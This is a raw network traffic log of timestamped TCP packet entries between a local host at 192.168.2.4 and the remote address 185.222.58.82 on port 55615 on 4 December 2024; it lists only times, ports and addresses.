Dec 4, 2024 13:17:27.693630934 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693643093 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693655014 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693782091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693794966 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.693955898 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694125891 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694138050 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694149017 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694294930 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694308043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694396019 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694408894 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694418907 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694431067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694442034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694453955 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694483042 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694494963 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694505930 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694516897 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694529057 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694540977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694564104 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694576025 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694587946 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694598913 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694611073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694621086 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694632053 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694645882 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694658041 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694863081 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694875956 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694886923 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.694897890 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695005894 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695018053 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695161104 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695174932 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695185900 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695318937 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695333004 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695452929 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695466042 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695477009 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695487976 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695595026 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695606947 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695765972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695777893 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695909977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.695921898 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696064949 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696078062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696089029 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696234941 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696247101 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696377993 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696391106 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696404934 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696455002 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696468115 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696618080 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696768999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696783066 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696794033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696904898 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696917057 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696928978 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696943045 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.696954966 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697223902 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697237015 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697247982 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697261095 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697272062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697284937 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697297096 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697360992 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697372913 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697385073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697411060 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697422981 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697434902 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697447062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697458029 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697475910 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697489977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697501898 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697525978 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697544098 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697597027 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697608948 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697621107 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697750092 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697762012 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697912931 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.697926044 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725558043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725579023 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725672960 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725686073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725811005 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725825071 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.725842953 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.726012945 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.804738045 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.804862976 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.804877996 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.804903030 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805180073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805193901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805205107 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805310011 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805324078 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805335999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805464983 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805478096 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805578947 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805593014 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805604935 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805617094 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805672884 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805685043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805808067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805829048 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805927992 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.805942059 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806066036 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806088924 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806171894 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806185007 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806282043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806296110 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806346893 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806408882 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806480885 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806521893 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806587934 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806647062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806720972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806746006 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806830883 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806896925 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806982994 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.806996107 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.807742119 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.808049917 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.808490992 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.808504105 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.808943033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.808957100 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809078932 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809092999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809106112 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809118032 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809231997 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809243917 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809390068 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809401989 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809415102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809540033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809552908 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809565067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809694052 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809705973 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809827089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809842110 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809854031 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809865952 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809880018 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809890985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809917927 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809940100 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809952974 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809964895 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809977055 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.809989929 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810003996 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810024977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810045004 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810059071 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810071945 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810084105 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810102940 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810115099 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810127020 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810138941 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810149908 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810162067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810174942 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810194969 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810220003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810233116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810245037 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810256004 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810267925 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810278893 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810345888 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810364962 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810502052 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810514927 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810626030 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810638905 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810651064 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810662985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810777903 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810791016 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810915947 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810929060 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.810942888 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811069012 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811081886 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811259985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811358929 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811372042 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811384916 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811397076 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811530113 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811543941 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811680079 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811692953 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811836004 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811849117 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.811992884 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812009096 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812146902 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812160015 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812300920 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812314034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812449932 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812463045 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812484980 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812611103 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812750101 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812763929 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812776089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812788010 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812876940 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812890053 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812901974 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.812913895 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813026905 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813041925 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813175917 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813189983 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813201904 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813332081 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813345909 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813357115 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813478947 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813493013 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813503981 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813632011 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813644886 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813781023 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813795090 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813808918 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813935041 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.813950062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814096928 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814109087 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814124107 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814249039 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814270020 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814281940 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814420938 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814433098 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814579964 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814593077 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814605951 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814619064 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814630985 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814739943 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814753056 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814888954 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814908981 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.814920902 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.815042973 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.815056086 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.815074921 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.834074974 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:28.923417091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:28.925497055 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:28.971267939 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.045243979 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.045325994 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.045960903 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.165662050 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.393733025 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.515048027 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515067101 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515081882 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515094042 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515105963 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515117884 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515130043 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515156031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515167952 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515176058 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.515181065 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.515245914 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.635502100 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.635560036 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.635680914 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.635688066 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.635703087 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.635757923 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.635802984 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.636009932 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.676172972 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.680088997 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.801539898 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.801651001 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:29.844171047 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.964260101 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:29.968085051 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.013484001 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.015484095 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.015573978 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.087996960 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.092010975 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135605097 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135610104 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135617971 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135627031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135688066 CET	49744	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:30.135694027 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135705948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135714054 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135729074 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.135737896 CET	49744	55615	192.168.2.4	185.222.58.82
